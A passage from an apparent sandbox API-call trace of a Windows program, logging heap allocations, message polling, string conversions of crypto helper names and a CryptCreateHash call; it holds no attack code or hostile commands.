dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0227.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0227.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0227.044] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0227.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0227.044] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0227.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0227.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0227.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0227.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ef8 [0227.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0227.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0227.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0227.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0227.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0227.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0227.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8f0 [0227.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0227.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0227.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0227.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0227.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0227.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0227.045] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0227.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0227.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0227.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0227.045] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0227.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0227.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0227.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0227.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8f0 | out: hHeap=0x970000) returned 1 [0227.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0227.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0227.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0227.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0227.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0227.045] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0227.046] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0227.046] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0227.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0227.046] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0227.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0227.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0227.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0227.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0227.046] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0227.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0227.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0227.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0227.046] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0227.046] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0227.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0227.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0227.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0227.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0227.311] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0227.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0227.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0227.312] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0227.312] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0227.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0227.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0227.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0227.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0227.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0227.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0227.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0227.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0227.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.312] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0227.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0227.312] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0227.313] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0227.313] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0227.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0227.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0227.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0227.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0227.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0227.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0227.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0227.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0227.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0227.314] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0227.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0227.314] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0227.314] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0227.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0227.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0227.314] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0227.314] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0227.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0227.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0227.315] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.315] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0227.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0227.315] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0227.315] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0227.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0227.315] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0227.315] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0227.315] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0227.315] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0227.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0227.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0227.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0227.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0227.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0227.315] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.316] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0227.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0227.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0227.316] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0227.316] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0227.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0227.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0227.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0227.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0227.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0227.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0227.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0227.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0227.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51328, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0227.316] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0227.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0227.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0227.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0227.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0227.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0227.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0227.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0227.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0227.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0227.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0227.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0227.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0227.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0227.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0227.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0227.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0227.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0227.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0227.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0227.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0227.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0227.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0227.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0227.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0227.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0227.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0227.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0227.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0227.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0227.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0227.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0227.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0227.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0227.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0227.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0227.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0227.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0227.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0227.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0227.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0227.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0227.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0227.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0227.320] HeapFree (in: hHeap=0x970000, 